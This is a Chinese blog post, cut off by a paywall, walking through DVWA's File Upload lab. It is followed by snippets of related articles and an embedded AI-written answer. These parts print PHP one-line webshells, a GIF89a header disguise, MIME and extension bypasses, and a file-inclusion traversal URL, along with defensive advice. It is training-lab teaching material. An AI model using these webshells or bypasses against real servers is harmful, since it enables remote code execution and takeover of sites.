Dvwa练习05 File Upload 文件上传

已于 2022-02-16 16:17:43 修改
阅读量522 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php p2p 开发语言
于 2022-02-11 22:51:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/coco3105/article/details/122890109

目的IP:192.168.142.133

本地IP:192.168.142.134

1.Security Level:Low

代码如下

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// Can we move the file to the upload folder?
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
		// No
		$html .= '<pre>您的图像未上传.</pre>';
	}
	else {
		// Yes!
		$html .= "<pre>{$target_path} 上传成功!</pre>";
	}
}

?>

服务器未对上传的文件做任何的检查和处理。我尝试在本地新建一个muma.php,写入一句话木马:<?php @eval($_POST['test']);?>

(注意标点符号用英文)

将文件上传到dvwa

返回文件上传到的路径!

                                                                                                                                                                                                                                                                          &nbs

最低0.47元/天 解锁文章

200万优质内容无限畅学
DVWA靶场练习五—File Upload
afei001
05-24 361
低级(Low Level) 1.将等级设置为:Low 2.查看分析源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uplo...
File Upload文件上传
kid的博客
04-19 1万+
File Upload 前言 文件上传漏洞:攻击者上传了一个可执行的脚本文件,通过此脚本文件获得了执行服务器端命令的功能。文件上传是否会产生漏洞关键在于服务器怎么来处理,怎么来解析这个文件。如果说服务器处理的模式不够安全,那么就会导致严重的后果,也就是上传了恶意的可执行文件以后,服务器端对此文件进行执行 文件上传漏洞需要对一句话木马,以及菜刀的使用有所了解。 练习 Low 文件上传我们直接先尝...
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 6272
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA 实验报告:5、文件上传 File Upload
看那白熊
05-16 1788
dvwa 文件上传漏洞复现
网络安全实验-DVWA文件漏洞上传
weixin_45431475的博客
10-29 1227
网络安全实验
DVWA实验-文件上传
Ping_Pig的博客
09-15 2707
我们来测试dvwa文件上传漏洞.我们先干,后分析代码 Low级别 我们发现上传界面是这样的 那我们按照要求来随便上传一个文件,我现在直接上传一个php文件,内容为 <?php phpinfo(); ?> 选择文件后点击上传可以发现页面有回显上传成功的提示和上传的路径 那么我们可以直接根据这个链接去访问下,看是否能够正常访问刚才上传成功的文件 上传成功,并...
Dvwa文件上传全级别学习笔记
Mbys_Lettuce的博客
09-21 1714
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。本次实验目标为利用上传的木马文件,获取目标服务器的权限,木马文件内容为:
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
靶场练习DVWAFile Inclusion(文件包含)操作/代码解析
night7i的博客
04-15 481
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
DVWA通关攻略之文件上传
勿山几已
05-22 3613
简要介绍文件上传漏洞及其利用
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 2350
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWA文件上传-菜刀工具
m0_64037702的博客
07-13 562
链接:https://pan.baidu.com/s/1jGuXh1XtLwssoEN1j3sGSA 提取码:shyh下载后解压上传文件搜集信息组成完整的后门路径菜刀中右键添加,输入收集到的后门路径,以及后门密钥点击添加。
DVWA(5)文件上传(File Upload) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 1052
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录今天带来第五期文件上传漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。
DVWA file upload
m0_73606240的博客
01-10 283
DVWA file include
dvwaFile upload
ANDTM的博客
05-18 194
我们首先了解一下一句话木马,一句话木马的代码一般为:?eval()函数表示括号里的内容把他当做PHP语言执行,@的作用是后面的代码及时出错也不报错,这样可以不暴露我们的上传的参数(也就是upload),完后$_POST[‘upload’],upload在这里是一个全局变量,我们后期要执行的代码都要通过赋值给upload来执行。我们后期如果要用菜刀进行连接时,也需要把我们的全局变量(也就是upload)告诉菜刀。
DVWA File Upload
部分学习记录
09-22 261
low 未对上传文件进行任何过滤,可以直接上传一个shell文件shell.php,例如一句话木马,通过暴露出的路径来执行该文件,然后利用菜刀进行连接,获取服务器文件信息,利用文件管理和虚拟终端进行其他操作 medium 要求上传JPEG或者PNG格式的图片 将shell.php修改为shell.png(绕过文件类型检测),尝试利用burp抓包修改文件后缀为php(上传到服务器后的文件名),上传成功 high 查看源代码发现对文件名进行了截取,其中涉及到了strrpos()函数,就去查了一下 由于限制
DVWA--File Upload
weixin_42191656的博客
08-02 838
DVWA平台File Upload漏洞Low和Medium实验
dvwa上传php文件,DVWAFile Upload文件上传
weixin_42177768的博客
03-18 390
1、file upload文件上传,测试界面2、security=low时的上传(1)直接上传php一句话木马,没有过滤,上传成功,根据提示路径链接菜刀(2)菜刀链接,webshell拿到3、security=medium时的上传(1)直接上传php格式文件,上传失败(2)测试上传图片格式文件,上传成功(3)使用Burp Suite工具进行两次抓包,在compare中比较(4)重新上传php木马,...
DVWA】--- 五、文件上传(File Upload)
qq_43168364的博客
05-31 371
File Upload 目录 一、Low级别 二、Medium级别 方法一 方法二 三、high级别 方法一 方法二 <>一、Low级别 代码审计 相关函数 basename() 函数:返回路径中的文件名部分。 move_uploaded_file(file,newloc):将上传的文件移动到新位置,file—要移动的文件,newloc—新的位置。 用户可以上传任意类型的文件,这里上传一句话木马进行连接 上传成功回显出了路径 连接,得到控制权 二、Me
DVWA -File Upload fi
最新发布
03-24
<think>嗯,用户想了解DVWA中的文件上传功能的安全测试或漏洞利用方法。首先,我需要回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的靶场,文件上传漏洞是常见的漏洞类型之一。用户可能需要从基础的上传恶意文件开始,逐步深入。 首先,安全测试通常包括绕过客户端验证。DVWA可能有不同安全等级的设置,比如Low级别可能只在前端做检查,而High级别可能有更严格的后端验证。例如,在Low级别下,用户可以直接上传PHP文件,因为服务器可能没有验证文件类型或内容。这时候需要指导用户如何修改前端代码,比如删除JavaScript验证,或者使用Burp Suite拦截请求修改文件类型。 接下来是绕过MIME类型检查。服务器可能会检查Content-Type,比如image/jpeg。这时候需要将恶意文件的Content-Type改为允许的类型,这可能通过Burp Suite修改请求头来实现。 然后是绕过扩展名检查。有些服务器通过黑名单来阻止危险扩展名,但可能遗漏某些情况,比如.php5、.phtml等。用户可以尝试上传这些变种扩展名,或者利用双扩展名如test.php.jpg来绕过检查。 对于内容检查,服务器可能检测文件头,比如GIF文件的GIF89a标识。用户可以在恶意文件前添加这些标识,伪装成图片文件,同时保留PHP代码。这需要一定的混淆技巧。 在漏洞利用方面,上传Web Shell是常见方法,比如使用一句话木马<?php system($_GET['cmd']); ?>,然后通过浏览器访问该文件执行系统命令。结合其他漏洞如文件包含漏洞,可以进一步利用,比如通过路径遍历上传文件到非预期目录,或者利用本地文件包含执行上传的恶意文件。 防御措施方面,应该提到白名单验证、重命名文件、存储文件到非Web目录、使用安全扫描工具等方法。例如,引用中的nikto工具可以用来检测常见错误配置,而sqlmap用于SQL注入测试,但文件上传漏洞可能需要其他工具。 需要确保用户理解不同安全等级(Low、Medium、High)的差异,并针对不同等级给出具体方法。例如,High级别可能需要更复杂的绕过技巧,比如结合服务器解析漏洞。同时,提醒用户注意法律和道德规范,仅在授权环境下测试。 最后,生成的相关问题需要覆盖漏洞原理、工具使用、防御措施和结合其他漏洞的情况,确保全面性。需要检查引用中的资料是否相关,比如引用3提到的nikto可以用来检查配置错误,引用4的sqlmap可能与文件上传无关,但用户的问题可能涉及综合测试。</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级分为低、中、高三种安全模式,对应不同防御强度。 --- #### 二、安全测试步骤 1. **基础文件上传测试** - **低安全级别**:直接上传`.php`文件(如`shell.php`),验证服务器是否允许执行 ```php <?php system($_GET['cmd']); ?> ``` - **绕过客户端验证**:禁用JavaScript或修改前端代码删除文件类型检查[^5] 2. **绕过MIME类型检查** - 使用Burp Suite拦截请求,将`Content-Type: application/php`改为`image/jpeg`[^3] 3. **绕过扩展名黑名单** - 尝试`.php5`、`.phtml`或双扩展名如`shell.php.jpg` 4. **绕过内容检查** - 在PHP文件头部添加图片标识(如`GIF89a`),伪装成图片: ```php GIF89a <?php system($_GET['cmd']); ?> ``` --- #### 三、漏洞利用示例 1. **Web Shell执行命令** - 上传成功后访问`http://靶机地址/hackable/uploads/shell.php?cmd=whoami`,可返回当前系统用户[^4] 2. **结合文件包含漏洞** - 若存在LFI漏洞,通过路径遍历执行上传文件: ``` http://靶机地址/vulnerabilities/fi/?page=../../uploads/shell.php ``` --- #### 四、防御措施 1. 使用白名单验证文件扩展名和MIME类型 2. 重命名上传文件(如`md5(时间戳).jpg`) 3. 将文件存储在非Web可访问目录[^2] 4. 部署WAF或使用`nikto`扫描检测配置错误[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旧时幻梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值